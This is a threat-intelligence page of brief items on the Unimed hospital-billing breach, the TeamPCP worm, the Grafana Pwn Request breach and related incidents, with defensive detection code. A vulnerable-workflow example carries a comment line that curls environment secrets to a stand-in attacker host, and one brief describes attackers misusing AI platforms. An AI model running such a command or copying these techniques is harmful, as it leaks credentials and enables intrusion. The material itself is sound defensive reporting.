ctipilot.ch

Breach at billing processor Unimed exfiltrates ~97,600+ patient records from six German university hospitals (attribution open)

incident · incident:unimed-german-hospitals-2026

Coverage timeline: 1 (first 2026-05-24 → last 2026-05-24)
Briefs: 1 (1 distinct)
Sources cited: 165 (79 hosts)
Sections touched: 1 (active_threats)
Co-occurring entities: 8

Story timeline

  1. 2026-05-24 · CTI Daily Brief — 2026-05-24 · active_threats
     First coverage: Unimed billing-processor breach, GDPR Art. 9 data; perpetrator unattributed per heise/The Record; ARWINI/Kairos resemblance flagged as analyst observation only

Where this entity is cited

  • active_threats (1)

Source distribution

  • bleepingcomputer.com 11 (7%)
  • securityweek.com 9 (5%)
  • therecord.media 9 (5%)
  • theregister.com 9 (5%)
  • attack.mitre.org 8 (5%)
  • helpnetsecurity.com 7 (4%)
  • thehackernews.com 7 (4%)
  • socket.dev 5 (3%)
  • other 100 (61%)

Items in briefs about Breach at billing processor Unimed exfiltrates ~97,600+ patient records from six German university hospitals (attribution open) (16)

Six German university hospitals lose ~97,600+ patient records to a breach at billing processor Unimed

From CTI Daily Brief — 2026-05-24 · published 2026-05-24

Unimed, a Saarland-based billing-service provider that handles private-insurance and self-payer invoicing for an estimated 95% of German university hospitals, was breached in mid-April 2026; attackers exfiltrated patient data and an attempted full encryption of Unimed's infrastructure was reportedly averted (heise online, 2026-05-22). On 2026-05-21 at least six state-funded Universitätsklinikum hospitals — Cologne, Freiburg, Heidelberg, Tübingen, Ulm and Mannheim — disclosed that their patients' data was among the stolen records (The Record, 2026-05-22). University Hospital Freiburg states master data for ~54,000 patients (names, addresses, dates of birth) was taken, with billing records for ~900 patients additionally exposing diagnoses and treatment methods, and bank-account data in a small number of those cases (Uniklinik Freiburg, 2026-05-21); Cologne reports ~30,000 affected (Uniklinik Köln, 2026-05-21). The exposed categories include GDPR Article 9 special-category health data (diagnoses, treatment codes) and financial data (IBANs). Attribution is open: heise states it is "not yet known who is responsible" for the Unimed attack, and The Record likewise reports no actor had publicly claimed responsibility at its publication. The intrusion does rhyme with the earlier ARWINI Lower-Saxony statutory-billing breach (covered 2026-05-19) — which the Hannover Police Directorate attributed to the Kairos ransomware group per heise — but that resemblance is an analyst pattern-overlap, not a sourced attribution of the Unimed breach.

Defender takeaway: This is the recurring "shared-service processor as the soft underbelly of healthcare" pattern — the hospitals' own clinical systems held, but a third-party billing aggregator concentrated Art. 9 data for dozens of institutions and became the single point of failure. heise notes encryption was attempted but blocked while exfiltration over the same access succeeded, the classic gap where endpoint controls stop the ransomware payload but not the prior data theft. CH/EU hospitals running outsourced billing should inventory which processors hold Art. 9 data on their behalf, confirm a data-protection impact assessment and Art. 32 technical measures are in place, and hunt for large outbound transfers from billing/ERP systems with no corresponding inbound job trigger and for service-account authentication outside business hours.
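
The two hunts in the takeaway above (large outbound transfers from billing/ERP hosts with no corresponding job trigger, and service-account logons outside business hours), as an added example that is not part of the brief and not Unimed's or any hospital's telemetry. It runs over constructed JSON-lines events; the event schema, the 30-minute trigger window, the 500 MiB threshold, the business-hours bounds and the `svc-` naming convention are assumptions to be replaced with the estate's own values.

```python
"""Two hunts from the Unimed takeaway, run over constructed sample events.

Rule A: a large outbound transfer from a billing/ERP host with no batch-job
        trigger on that host inside the preceding window.
Rule B: a successful service-account authentication outside business hours.
Event format, field names and thresholds are assumptions for this example.
"""
import json
from datetime import datetime, timedelta

BUSINESS_START, BUSINESS_END = 7, 19          # local hours, assumed
MAX_TRIGGER_AGE = timedelta(minutes=30)        # assumed: job trigger must precede transfer by <= 30 min
MIN_SUSPICIOUS_BYTES = 500 * 1024 * 1024       # 500 MiB, assumed threshold
SERVICE_ACCOUNT_PREFIX = "svc-"                # assumed naming convention

# Constructed sample events (JSON Lines); timestamps carry the local offset (CEST).
SAMPLE_EVENTS = """\
{"ts":"2026-04-14T02:10:00+02:00","type":"job_trigger","host":"bill-app-01","job":"nightly-export"}
{"ts":"2026-04-14T02:12:30+02:00","type":"netflow","host":"bill-app-01","dst":"10.20.0.5","bytes_out":734003200}
{"ts":"2026-04-14T03:40:12+02:00","type":"auth","host":"bill-db-02","user":"svc-billing-sync","result":"success"}
{"ts":"2026-04-14T03:41:05+02:00","type":"netflow","host":"bill-db-02","dst":"203.0.113.7","bytes_out":2147483648}
{"ts":"2026-04-14T10:15:00+02:00","type":"auth","host":"bill-app-01","user":"svc-billing-sync","result":"success"}
{"ts":"2026-04-14T11:00:00+02:00","type":"netflow","host":"bill-app-01","dst":"10.20.0.5","bytes_out":1048576}
"""


def parse_events(text):
    """Parse JSON Lines into dicts with timezone-aware datetimes, oldest first."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    for e in events:
        e["ts"] = datetime.fromisoformat(e["ts"])
    return sorted(events, key=lambda e: e["ts"])


def untriggered_transfers(events):
    """Rule A: large outbound transfers with no job trigger on the same host in the window.

    Linear scan per transfer is fine for a sample; index triggers by host for real volumes.
    """
    findings = []
    for e in events:
        if e["type"] != "netflow" or e["bytes_out"] < MIN_SUSPICIOUS_BYTES:
            continue
        triggered = any(
            t["type"] == "job_trigger" and t["host"] == e["host"]
            and timedelta(0) <= e["ts"] - t["ts"] <= MAX_TRIGGER_AGE
            for t in events
        )
        if not triggered:
            findings.append((e["host"], e["dst"], e["bytes_out"]))
    return findings


def off_hours_service_logons(events):
    """Rule B: successful service-account logons on weekends or outside business hours."""
    findings = []
    for e in events:
        if e["type"] != "auth" or e["result"] != "success":
            continue
        if not e["user"].startswith(SERVICE_ACCOUNT_PREFIX):
            continue
        local = e["ts"]  # the sample offsets are already local time (assumed)
        off_hours = local.weekday() >= 5 or not (BUSINESS_START <= local.hour < BUSINESS_END)
        if off_hours:
            findings.append((e["user"], e["host"], local.isoformat()))
    return findings


if __name__ == "__main__":
    evts = parse_events(SAMPLE_EVENTS)
    for f in untriggered_transfers(evts):
        print("RULE-A untriggered large transfer:", f)
    for f in off_hours_service_logons(evts):
        print("RULE-B off-hours service-account logon:", f)
```

In the sample, the 2 GiB transfer from bill-db-02 has no preceding job trigger and sits one minute after an off-hours logon by the same service account on the same host; correlating the two findings on host and time is what turns two low-severity alerts into one worth paging on. Nightly batch jobs that legitimately run at 02:00 are excused only because their trigger event is logged; if the scheduler is not forwarding those triggers, Rule A will fire on every export, so that feed is a prerequisite.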

ANNUAL REPORT — Check Point Research March-April 2026 AI Threat Landscape Digest: a single operator runs two AI platforms in parallel to breach nine Mexican government agencies [SINGLE-SOURCE]

From CTI Daily Brief — 2026-05-23 · published 2026-05-23

Check Point Research's March-April 2026 AI Threat Landscape Digest (published 2026-05-22) is the most operationally striking annual / periodic AI report of the past month. The centrepiece, researched by Gambit Security and summarised in the Check Point post, documents a single unidentified operator compromising nine Mexican government agencies between December 2025 and February 2026, covering tax records, civil registry, patient files and electoral infrastructure. The structural innovation: the attacker ran two commercial AI platforms in parallel, one managing live exploitation and issuing >5,000 AI-executed commands, the other processing harvested data and feeding instructions back into the first. Persistence for the AI itself was simple: modifying the AI client's startup configuration file to embed persistent instructions inherited by every subsequent session.

Two further findings have direct EU/CH public-sector implications. First, the EvilTokens platform — a commercial jailbreak-as-a-service tool packaging AI-driven phishing generation, financial-data extraction and similar capabilities as a subscription — represents the same commoditisation curve as Kali365 (§ 1) but for AI-assisted intrusion. Second, CPR explicitly calls out that stolen API keys for Anthropic, OpenAI, Groq and Mistral are now high-value criminal targets, since they grant access to powerful AI services without an account; Swiss federal and cantonal agencies using commercial AI APIs should treat key rotation cadence and source-IP scoping (Conditional Access on the API layer) on par with classic privileged-credential hygiene. Detection vantage: bulk exfiltration events temporally co-located with anomalous API call patterns to commercial AI services from non-standard processes; process trees in which AI client libraries spawn data-collection subprocesses; cloud audit logs showing API key issuance followed immediately by large-volume inference calls from unusual source IPs.

UPDATE: TeamPCP / Mini Shai-Hulud campaign — GitHub itself breached (~3,800 internal repos via poisoned VS Code extension), Microsoft `durabletask` PyPI worm propagates via AWS SSM and `kubectl exec`, Grafana confirms missed-token-rotation root cause

From CTI Daily Brief — 2026-05-21 · published 2026-05-21

UPDATE (originally covered 2026-05-13 deep dive; multiple subsequent updates): three new TeamPCP / Mini Shai-Hulud developments landed in this window — GitHub itself, the official Microsoft durabletask PyPI package, and the Grafana Labs root-cause disclosure.

GitHub. GitHub confirmed on 2026-05-20 that TeamPCP (also tracked as UNC6780) accessed approximately 3,800 internal GitHub repositories after a single GitHub employee installed a poisoned Visual Studio Code extension on their device (The Hacker News, 2026-05-20; The Record, 2026-05-20; Infosecurity Magazine, 2026-05-20; Help Net Security, 2026-05-20). GitHub detected and contained the breach on 2026-05-19, isolated the affected endpoint and rotated high-impact secrets; the company states there is no evidence customer data stored outside the internal repositories was accessed. GitHub has not publicly named the malicious VS Code extension or its publisher at this writing. TeamPCP listed the stolen repositories — including GitHub Actions internals, agentic-workflow code, Copilot internal projects, CodeQL tools, Codespaces, Dependabot, and a Rails controller managing organisations and PRs — for sale at $50,000, with LAPSUS$ announcing a joint sale and a $95,000 asking price.

durabletask (PyPI). Wiz Security reported on 2026-05-20 that the TeamPCP / Mini Shai-Hulud worm had compromised the official Microsoft durabletask PyPI package, publishing malicious versions 1.4.1, 1.4.2 and 1.4.3 (Wiz, 2026-05-20). The payload is a dropper that fetches rope.pyz from check.git-service[.]com; per Wiz the second stage is a full credential stealer targeting AWS, Azure, GCP, Kubernetes and Vault credentials, 1Password and Bitwarden vaults, filesystem credentials and shell history. Propagation per Wiz: on Kubernetes hosts the worm uses kubectl exec; on AWS EC2 instances it propagates via AWS Systems Manager SendCommand against up to 5 targets per host (T1078.004 Cloud Accounts, T1570 Lateral Tool Transfer).

Grafana Labs. Grafana Labs published the post-mortem of its own TeamPCP breach on 2026-05-19, confirming the root cause was a single GitHub Actions workflow token that slipped through the rotation process after the TanStack npm supply-chain attack (Grafana Labs, 2026-05-19; BleepingComputer, 2026-05-20). Per Grafana's own post-mortem the TanStack compromise was detected on 2026-05-11 (note: BleepingComputer cites 2026-05-01 for the malicious-package consumption event — surfaced as a contradiction in § 7); Grafana rotated the bulk of its GitHub workflow tokens, but the residual unrotated token gave TeamPCP access to clone private source-code repositories (exact count not disclosed in Grafana's post-mortem). Grafana refused the extortion demand on 2026-05-16. The exfiltration scope is confirmed limited to Grafana Labs GitHub repositories (public source code, private source code and internal repos); customer production data was not affected.

Defender takeaway: audit VS Code extension marketplace policies and consider a managed extensions allowlist via Group Policy / MDM (the VS Code marketplace does not enforce mandatory code-signing). Hunt — Sysmon EID 1 for code --install-extension invocations on developer endpoints; process trees where Code.exe or code-server spawn credential-access tools (git-credential-manager, aws configure, keychain access). Audit GitHub Actions OIDC token rotation completeness after any supply-chain incident; verify GitHub secret-scanning + push-protection are enabled on every org. CI/CD pipeline logs should be searched for durabletask imports in the 1.4.1–1.4.3 version range; treat any host that imported a malicious version as fully compromised. Review AWS SSM SendCommand audit logs for invocations that do not correspond to authorised maintenance windows.
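
The two endpoint hunts from the takeaway above (`code --install-extension` invocations, and VS Code spawning credential-access tools), as an added example over constructed Sysmon Event ID 1 records; this is not code from the brief, from GitHub or from any cited source. The extension id `acme.sample-extension` is a placeholder (GitHub has not named the real extension), the sample paths and users are constructed, and the process-name sets are assumptions to extend for macOS, where VS Code's helper processes carry different names.

```python
"""Two endpoint hunts over constructed Sysmon Event ID 1 (process creation) records.

R1: a VS Code binary invoked with --install-extension <id>.
R2: a VS Code process spawning a credential-access tool
    (git-credential-manager, or 'aws configure ...').
Field names follow Sysmon EID 1; the process-name sets are assumptions to tune.
"""
import re
from pathlib import PurePath

VSCODE_IMAGES = {"code.exe", "code", "code-server"}   # assumed; add macOS helper names for Macs
CRED_TOOLS = {"git-credential-manager.exe", "git-credential-manager",
              "aws.exe", "aws"}                        # assumed; extend per estate
INSTALL_RE = re.compile(r"--install-extension\s+(\S+)", re.IGNORECASE)


def _rec(image, cmdline, parent, user, utc):
    return {"UtcTime": utc, "Image": image, "CommandLine": cmdline,
            "ParentImage": parent, "User": user}


CODE_WIN = "C:\\Users\\dev\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
SAMPLE_EVENTS = [  # constructed records, not real telemetry
    _rec(CODE_WIN, f'"{CODE_WIN}" --install-extension acme.sample-extension',
         "C:\\Windows\\explorer.exe", "CORP\\dev", "2026-05-18 09:02:11.000"),
    _rec("C:\\Program Files\\Git\\mingw64\\bin\\git-credential-manager.exe",
         "git-credential-manager.exe get", CODE_WIN, "CORP\\dev", "2026-05-18 09:05:40.000"),
    _rec("C:\\Program Files\\Amazon\\AWSCLIV2\\aws.exe", "aws s3 ls",
         CODE_WIN, "CORP\\dev", "2026-05-18 09:06:02.000"),
    _rec("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
         "powershell -c Get-Date", "C:\\Windows\\explorer.exe", "CORP\\dev", "2026-05-18 09:07:00.000"),
    _rec("/usr/bin/aws", "aws configure list", "/usr/share/code/code", "dev", "2026-05-18 07:12:09.000"),
]


def basename(path):
    """Lower-cased final path component; tolerates Windows and POSIX separators."""
    return PurePath(path.replace("\\", "/")).name.lower()


def detect_extension_installs(events):
    """R1: returns (user, extension_id) for every CLI extension install by a VS Code binary."""
    hits = []
    for e in events:
        m = INSTALL_RE.search(e.get("CommandLine", ""))
        if m and basename(e["Image"]) in VSCODE_IMAGES:
            hits.append((e["User"], m.group(1)))
    return hits


def detect_vscode_spawning_cred_tools(events):
    """R2: returns (user, child_tool, command_line) when VS Code is the parent of a credential tool."""
    hits = []
    for e in events:
        parent = basename(e.get("ParentImage", ""))
        child = basename(e["Image"])
        if parent not in VSCODE_IMAGES or child not in CRED_TOOLS:
            continue
        cmd = e.get("CommandLine", "").lower()
        # 'aws s3 ls' from an integrated terminal is routine; only credential handling counts
        if child.startswith("aws") and "configure" not in cmd:
            continue
        hits.append((e["User"], child, e["CommandLine"]))
    return hits


if __name__ == "__main__":
    for h in detect_extension_installs(SAMPLE_EVENTS):
        print("R1 extension install:", h)
    for h in detect_vscode_spawning_cred_tools(SAMPLE_EVENTS):
        print("R2 VS Code -> credential tool:", h)
```

Two caveats. R1 only sees installs performed through the command line; an install from the Extensions view happens inside the VS Code process and produces no such command line, so the preventive control (a managed allowlist such as VS Code's `extensions.allowed` policy setting, where the deployed version supports it) matters more than the detection. R2 will fire on developers who legitimately run `aws configure` from the integrated terminal, so the parent chain should be checked for a shell between Code.exe and the tool; a credential tool spawned directly by the extension host, with no interactive shell in between, is the stronger signal.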

7-Eleven confirms ShinyHunters breach of 600,000+ Salesforce franchise-application records — same campaign as Instructure, Vimeo, Wynn Resorts, Vercel, Medtronic

From CTI Daily Brief — 2026-05-19 · published 2026-05-19

7-Eleven, Inc. confirmed on 2026-05-18 that an unauthorised third party accessed systems storing franchisee documents on 2026-04-08, in a breach claimed by ShinyHunters on or around 2026-04-17 (SecurityWeek, 2026-05-18; Security Affairs, 2026-05-18). ShinyHunters listed over 600,000 Salesforce CRM records covering personal and corporate data from franchise applications, initially demanding a ransom with a 2026-04-21 deadline and then offering the data for sale at $250,000 on a hacker forum. 7-Eleven filed a Maine Attorney General notification dated 2026-05-01 confirming 24 months of IDX identity-theft protection for affected individuals (Maine AG breach notification, 2026-05-01). The Maine filing lists only 2 Maine residents but the ShinyHunters claim covers 600,000+ records globally. SecurityWeek attributes the broader campaign — Instructure (Canvas), Vimeo, Wynn Resorts (21,000 employees), Vercel and Medtronic among confirmed co-victims — not to Salesforce-product vulnerabilities but to phishing, third-party-integration abuse, and customer-side misconfiguration of Salesforce Connected Apps.

Why it matters to us: ShinyHunters is the same actor that hit Instructure last week, with the broader Salesforce-targeting campaign continuing across sectors. The campaign vector is identity-side rather than Salesforce-product-side — Connected App OAuth grant abuse, phishing of admin sessions, mis-scoped third-party SaaS integrations. EU/CH public-sector and finance tenants using Salesforce for partner / supplier / case-management data should audit Connected App OAuth grants (particularly to third-party AI SaaS integrations), enable Salesforce Event Monitoring with alerts on bulk Report Export events and high-volume SOQL API calls, enforce IP-range / Trusted-IP session policies, and consider Salesforce Shield field-level encryption for PII. T1078.004 (Cloud Accounts), T1530 (Data from Cloud Storage Object), T1567.002 (Exfiltration to Cloud Storage).

UPDATE: Grafana Labs CoinbaseCartel breach — victim confirms source-code-only theft, no customer data, ransom rejected

From CTI Daily Brief — 2026-05-19 · published 2026-05-19

UPDATE (originally covered 2026-W21): Grafana Labs issued an official 2026-05-18 confirmation of the GitHub Pwn-Request breach previously reported in the 2026-W21 weekly summary (SecurityWeek, 2026-05-18; BleepingComputer, 2026-05-18; The Register, 2026-05-18). The material new disclosures in the 2026-05-18 confirmation: Grafana explicitly states (a) only source code was accessed — "no personal or customer information was stolen"; (b) the incident has not impacted customer systems or operations; (c) the ransom was refused. The technical-mechanism details (pull_request_target workflow misconfiguration, forked-PR injection of a curl command, harvested write-scoped GitHub token, canary-token detection) were previously reported in the 2026-W21 weekly summary citing THN's earlier coverage (The Hacker News, 2026-05-17); they are repeated here as context for defenders who did not catch the weekly. CoinbaseCartel is assessed by THN as an offshoot of the ShinyHunters / Scattered Spider / LAPSUS$ ecosystem and has accumulated ~170 victims since September 2025.

Defender takeaway: Grafana OSS is the de facto monitoring/observability platform in EU/CH public-sector SOC and NOC environments; defenders should monitor non-official Grafana plugin updates and unsigned Grafana agent builds for the next 30 days as a potential supply-chain trojanisation follow-on. The Pwn-Request attack pattern is the same class of CI/CD misconfiguration covered by SentinelOne's Living off the Pipeline taxonomy (referenced 2026-05-16); audit every pull_request_target workflow to ensure no privileged steps run on untrusted-fork code, set permissions: read-all at workflow level and elevate only as needed, and separate privilege-requiring steps into a second workflow_run workflow gated on merged code. MITRE T1195.002 / T1552.004 / T1567.

Education — Canvas/Instructure breach and EU/CH GDPR exposure

From CTI Weekly Summary — 2026-W21 (Mon 18 – Sun 24, 2026) · published 2026-05-18

Canvas LMS serves Swiss federal universities (ETH, EPFL), cantonal university systems, and major EU higher-education institutions. The ShinyHunters double-intrusion and ransom payment create ongoing GDPR Art. 33/34 notification exposure for all EU institutions that deployed Canvas and received student-data-scope notifications from Instructure. The US House investigation deadline (2026-05-21) is a political milestone; the regulatory follow-up from EU supervisory authorities (Germany, Austria, Switzerland) is the operationally relevant compliance risk for this audience.

Grafana Labs / CoinbaseCartel — Pwn-Request GitHub Actions breach; private codebase exfiltrated; ransom rejected

From CTI Weekly Summary — 2026-W21 (Mon 18 – Sun 24, 2026) · published 2026-05-18

On 2026-05-16, Grafana Labs disclosed that CoinbaseCartel, a data-extortion group active since September 2025 that focuses exclusively on theft without encryption, exploited a pull_request_target GitHub Actions workflow misconfiguration ("Pwn Request") to exfiltrate a privileged GitHub token and clone the private codebase. The attack vector: fork a public repository and open a pull request whose code the base repository's pull_request_target workflow then executes (that trigger runs in the base repository's context, with its secrets and a write-scoped GITHUB_TOKEN, even for a PR from a fork); have the injected build step curl the workflow's environment variables out to an encrypted file; delete the fork to erase evidence. Grafana detected the exfiltration via a triggered canary token embedded in the private code (not from automated secrets-scanning). Ransom was demanded and rejected. Grafana confirmed no customer data, production systems, or running infrastructure was accessed; the exposure was private source code. The canary-token detection is an instructive model; the pull_request_target vulnerability class is the same pattern documented in tj-actions/changed-files (SLSA gap).

Hunt for this in your own GitHub organisation: audit logs for pull_request_target workflow runs where head_repository.owner differs from the base repository owner.
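
What the Pwn Request misconfiguration described in the item above looks like in a workflow file, beside the split prescribed in the 2026-05-19 takeaway (`permissions: read-all` at workflow level, privileged steps moved into a `workflow_run` workflow that runs only base-branch code). This is a constructed illustration added here, not Grafana Labs' workflow and not from any cited source; the action versions, job names, artifact names and `npm` commands are assumptions.

```yaml
# --- VULNERABLE: .github/workflows/pr-checks.yml (constructed illustration of the Pwn Request class)
name: pr-checks
on:
  pull_request_target:             # fires for PRs from forks, but runs in the BASE repo's context
permissions: write-all             # GITHUB_TOKEN is write-scoped and repository secrets are reachable
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}   # checks out the FORK's commit
      - run: npm ci && npm test    # package.json lifecycle scripts from the fork now run with the
                                   # write token; 'env | curl -d @- https://attacker.example' is enough

# --- HARDENED, workflow 1: .github/workflows/pr-build.yml (untrusted code, no secrets)
name: pr-build
on:
  pull_request:                    # fork PRs get a read-only GITHUB_TOKEN and no repository secrets
permissions: read-all
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4  # PR merge commit; acceptable here because nothing is privileged
      - run: npm ci && npm test
      - run: echo "${{ github.event.pull_request.number }}" > pr_number.txt
      - uses: actions/upload-artifact@v4
        with:
          name: pr-number
          path: pr_number.txt

# --- HARDENED, workflow 2: .github/workflows/pr-comment.yml (privileged, base-branch code only)
name: pr-comment
on:
  workflow_run:
    workflows: ["pr-build"]
    types: [completed]
permissions: read-all              # workflow-level default stays read-only ...
jobs:
  comment:
    if: ${{ github.event.workflow_run.conclusion == 'success' }}
    runs-on: ubuntu-latest
    permissions:
      contents: read
      pull-requests: write         # ... and is elevated only on this job, only for what it needs
    steps:
      - uses: actions/checkout@v4  # workflow_run checks out the base repo's default branch, never the fork
      - uses: actions/download-artifact@v4
        with:
          name: pr-number
          run-id: ${{ github.event.workflow_run.id }}
          github-token: ${{ secrets.GITHUB_TOKEN }}
      - name: Post result (the artifact came from an untrusted run, so validate before use)
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          RUN_ID: ${{ github.event.workflow_run.id }}
        run: |
          pr=$(tr -cd '0-9' < pr_number.txt)
          [ -n "$pr" ] || { echo "artifact did not contain a PR number"; exit 1; }
          gh pr comment "$pr" --repo "$GITHUB_REPOSITORY" --body "pr-build succeeded in run $RUN_ID"
```

If `pull_request_target` is genuinely needed (labelling fork PRs, for instance), keep it but never check out `github.event.pull_request.head.*` in that workflow and never run the PR's build scripts there. The audit query in the item above (runs where the head repository owner differs from the base owner) lists exactly the runs in which a checkout of fork code would have executed with the base repository's token.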

Škoda Auto Deutschland — online-shop breach exposes customer PII and password hashes

From CTI Weekly Summary — 2026-W20 (May 11 – May 17, 2026) · published 2026-05-17

Customer PII and password hashes exposed; logging-gap prevented exfiltration confirmation. The defender's learning is the logging-coverage point: a breach where the victim cannot confirm what was exfiltrated is a logging-design failure. Pattern-match: which of your own citizen-facing / customer-facing e-commerce flows would leave you with the same uncertainty after an intrusion? (daily 2026-05-12).

Sophos 2026 State of Identity Security — 71% of orgs breached via identity, 41% root-caused to non-human-identity mismanagement, Switzerland records highest incidence

From CTI Weekly Summary — 2026-W20 (May 11 – May 17, 2026) · published 2026-05-17

Published 2026-05-15. Vendor-agnostic survey of 5,000 IT and security leaders across 17 countries (Q1 2026 fieldwork). The defender-relevant findings beyond the headline 71% identity-breach figure: (a) identity-to-ransomware pipeline dominant — 67% of ransomware victims attributed their ransomware incident directly to a prior identity attack, establishing identity-protocol abuse as the operationally dominant initial-access pattern; (b) non-human identity (NHI) mismanagement is the leading root cause — service accounts, API keys, AI-agent identities outnumber human identities by ratios up to 100:1 in surveyed organisations, weak NHI lifecycle management was the root cause in 41% of successful identity breaches, only 34% of organisations regularly audit NHI accounts; (c) Switzerland records the highest identity-breach incidence globally in the survey period; the daily 2026-05-15 also reported energy as the hardest-hit sector (Sophos blog; Help Net Security — Sophos 2026 identity-breach costs report; daily 2026-05-15).

The synthesis lens the daily did not have room for: the Sophos data corroborates the W19 Mandiant M-Trends finding that identity-rooted intrusions dominate IR-case data, and it converges with the Verizon DBIR 2026 finding (below) that stolen credentials remain the most common initial-access vector. The composite picture: for Swiss federal / cantonal estates with high service-account density and no NHI lifecycle governance, the NHI inventory + lifecycle gap is the single highest-leverage control deficit disclosed in this week's research output. The Sophos data is the empirical basis for prioritising NHI governance over endpoint-EDR upgrades, where budget pressure forces a choice. Detection focus: anomalous service-account Kerberos TGS requests (T1558.003 Kerberoasting), unusual OAuth token grants from CI/CD service identities, API key usage from unexpected source IPs or geographies.
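
The first detection focus named above (anomalous service-account Kerberos TGS requests, T1558.003), as an added example over constructed Windows Security event 4769 records; this is not code from Sophos or from the brief. The thresholds (five distinct SPNs within five minutes) and the `svc-` style account names are assumptions; the encryption-type codes 0x17 (RC4-HMAC) and 0x12 (AES256-CTS-HMAC-SHA1-96) are the standard 4769 values.

```python
"""Kerberoasting (T1558.003) detection over constructed Windows Security 4769 records.

(a) RC4-HMAC (0x17) service tickets requested for non-machine service accounts;
(b) one requester obtaining tickets for many distinct SPNs inside a short window.
Field names follow event 4769; thresholds and account names are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                      # TicketEncryptionType: 0x17 RC4, 0x12 AES256, 0x11 AES128
BURST_WINDOW = timedelta(minutes=5)    # assumed
BURST_DISTINCT_SPNS = 5                # assumed


def _ev(t, user, spn, etype, ip="10.10.5.23", status="0x0"):
    return {"TimeCreated": t, "TargetUserName": user, "ServiceName": spn,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": status}


SAMPLE_4769 = [  # constructed records, not real telemetry
    _ev("2026-05-12T22:14:01", "jdoe@CORP.EXAMPLE", "svc-sql01", "0x17"),
    _ev("2026-05-12T22:14:03", "jdoe@CORP.EXAMPLE", "svc-sql02", "0x17"),
    _ev("2026-05-12T22:14:04", "jdoe@CORP.EXAMPLE", "svc-web01", "0x17"),
    _ev("2026-05-12T22:14:05", "jdoe@CORP.EXAMPLE", "krbtgt", "0x17"),      # TGT traffic, excluded
    _ev("2026-05-12T22:14:06", "jdoe@CORP.EXAMPLE", "svc-backup", "0x17"),
    _ev("2026-05-12T22:14:09", "jdoe@CORP.EXAMPLE", "svc-erp", "0x17"),
    _ev("2026-05-12T22:15:30", "jdoe@CORP.EXAMPLE", "svc-crm", "0x17"),
    _ev("2026-05-12T22:16:00", "WS-042$@CORP.EXAMPLE", "FS01$", "0x12", ip="10.10.7.8"),  # machine account, benign
    _ev("2026-05-12T22:20:00", "asmith@CORP.EXAMPLE", "svc-sql01", "0x12", ip="10.10.5.40"),  # single AES request, benign
]


def is_service_account(service_name):
    """Exclude machine accounts (trailing $) and the KDC itself; neither is a roastable target."""
    name = service_name.split("/")[0]
    return not name.endswith("$") and name.lower() != "krbtgt"


def rc4_service_tickets(events):
    """Rule (a): successful RC4 TGS requests for service accounts. Noisy where AES is not enforced."""
    return [(e["TargetUserName"], e["ServiceName"], e["IpAddress"])
            for e in events
            if e["Status"] == "0x0" and e["TicketEncryptionType"] == RC4_HMAC
            and is_service_account(e["ServiceName"])]


def tgs_bursts(events, window=BURST_WINDOW, min_distinct=BURST_DISTINCT_SPNS):
    """Rule (b): per requester, the largest set of distinct service accounts ticketed in any window."""
    per_user = defaultdict(list)
    for e in events:
        if e["Status"] == "0x0" and is_service_account(e["ServiceName"]):
            per_user[e["TargetUserName"]].append(
                (datetime.fromisoformat(e["TimeCreated"]), e["ServiceName"]))
    findings = []
    for user, reqs in per_user.items():
        reqs.sort()
        start, best = 0, set()
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:   # slide the window's left edge
                start += 1
            spns = {spn for _, spn in reqs[start:end + 1]}
            if len(spns) > len(best):
                best = spns
        if len(best) >= min_distinct:
            findings.append((user, len(best)))
    return findings


if __name__ == "__main__":
    print("RC4 service tickets:", rc4_service_tickets(SAMPLE_4769))
    print("TGS bursts:", tgs_bursts(SAMPLE_4769))
```

Rule (b) deliberately ignores the cipher: roasting tools can request AES tickets where the account supports them, so an estate that only alerts on 0x17 misses the attacker who does. Conversely, rule (a) is the one that catches a slow, single-target roast that never forms a burst, at the cost of noise in domains where RC4 is still negotiated routinely; enforcing AES on service accounts is what makes (a) quiet enough to page on.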

Sophos 2026 State of Identity Security: Switzerland records highest identity-breach incidence globally; energy and federal government hardest-hit sectors [SINGLE-SOURCE]

From CTI Daily Brief — 2026-05-15 · published 2026-05-15

Sophos published its State of Identity Security 2026 survey on 2026-05-14, drawing on responses from IT and cybersecurity leaders across 17 countries (Help Net Security, 2026-05-14). The headline finding is that more than 70% of surveyed organisations experienced at least one identity-related breach in the prior 12 months. Swiss organisations recorded the highest breach incidence among all surveyed countries. Sector analysis places energy, oil/gas, and utilities alongside federal government as the verticals with the highest breach rates — and two-thirds of ransomware victims in the survey attributed initial access to an identity compromise: stolen credentials, session hijacking, or MFA bypass. The survey corroborates NCSC-CH's sustained advisory focus on credential abuse and the trend visible across this brief series (Lumma Stealer takedown, FamousSparrow credential harvesting, TeamPCP OIDC token theft). Defenders in CH/EU public-sector environments should audit conditional access policies and MFA resilience controls — particularly for energy-sector service accounts and Entra ID/ADFS federations — against the pattern of phishing-resistant MFA requirements in NCSC-CH guidance.

Dutch IGJ rules Clinical Diagnostics/NMDL failed NEN 7510 information-security standard at time of July 2025 ransomware breach; ~941,000 patients affected, cervical-cancer screening data exposed

From CTI Daily Brief — 2026-05-14 · published 2026-05-14

The Dutch Health & Youth Care Inspectorate (Inspectie Gezondheidszorg en Jeugd, IGJ) issued a public finding on 2026-05-13 concluding that Clinical Diagnostics LCPL BV and NMDL BV (Rijswijk) did not meet the mandatory NEN 7510 information-security standard at the time of their July 2025 ransomware breach, and had not fully remediated the deficiencies as of IGJ's December 2025 follow-up inspection (IGJ, 2026-05-13; native title: "Clinical Diagnostics voldeed niet aan wettelijke norm voor informatiebeveiliging" — "Clinical Diagnostics did not meet the statutory information-security standard"). NEN 7510 is the Dutch statutory information-security baseline for healthcare organisations under the Wabvpz, structurally aligned with ISO/IEC 27001 but extended for health-data obligations; non-compliance is independently actionable by multiple regulators.

